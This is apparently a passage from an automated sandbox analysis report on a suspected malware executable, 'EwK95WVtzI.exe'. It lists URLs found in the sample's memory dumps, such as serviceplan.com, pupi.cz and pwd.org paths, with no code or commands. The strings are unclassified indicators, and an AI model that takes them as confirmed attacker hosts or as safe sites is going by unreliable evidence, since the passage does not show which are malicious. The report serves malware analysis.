                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/js/wp-embed.min.js?ver=5.8
                Source: EwK95WVtzI.exe, 00000000.00000003.1982286537.0000000008880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1994596568.00000000062C0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1985032372.0000000008380000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1997449210.0000000004980000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2015628406.0000000005130000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2007135483.0000000005F10000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1504658474.0000000007880000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-includes/wlwmanifest.xml
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pdqhomes.com/C
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.petsfan.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.petsfan.com/n
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001613000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.photo4b.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.photo4b.com/8
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.0000000001613000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pr-park.com/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2065701506.00000000077A0000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000166B000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pupi.cz/
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000166B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pupi.cz/&.
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pupi.cz/aV
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000166B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pupi.cz/b.
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pupi.cz/duH
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pupi.cz/z
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pwd.org/
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pwd.org/=V
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pwd.org/_V0
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pwd.org/yV
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quadlock.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.reglera.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.reglera.com/C
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.000000000167F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.reglera.com/W
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000162E000.00000004.00000020.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rs-ag.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1844171845.0000000001625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rs-ag.com/Y
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sclover3.com/R
                Source: EwK95WVtzI.exe, 00000000.00000002.2744288397.000000000159E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sclover3.com/Z
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.serviceplan.com/
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.serviceplan.com/blog_de/
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.serviceplan.com/blog_de/2013/06/leadershipreputation/
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.serviceplan.com/blog_de/2013/06/messung-von-user-experience/
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.serviceplan.com/blog_de/2013/06/the-creative-exchange-4/
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.serviceplan.com/fileadmin/templates_sp/images/favicon.ico
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.serviceplan.com/presse/news.html
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.serviceplan.com/presse/news.html#news2772
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.serviceplan.com/presse/news.html#news2789
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.serviceplan.com/presse/news.html#news2792
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.serviceplan.com/presse/news.html#news2793
                Source: EwK95WVtzI.exe, 00000000.00000003.1738876014.0000000004A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.serviceplan.com/presse/news.html#news2822
                Source: EwK95WVtzI.exe, 00000000.00000003.1515274965.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2397345490.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1669559647.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1774307473.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1694578526.0000000004720000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2390844918.0000000003E60000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000002.2773506390.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1650351949.0000000004820000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1515756554.0000000004DD0000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2280543004.0000000003E50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2035794915.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2025405422.0000000005690000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1501880576.0000000003D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1892082797.0000000004050000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1516104839.0000000003850000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2024800885.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2023550353.0000000003D50000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1623241554.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2031272771.0000000005580000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.2127544793.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, EwK95WVtzI.exe, 00000000.00000003.1594794829.0000000003E90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.serviceplan.com/presse/news.html#news2831
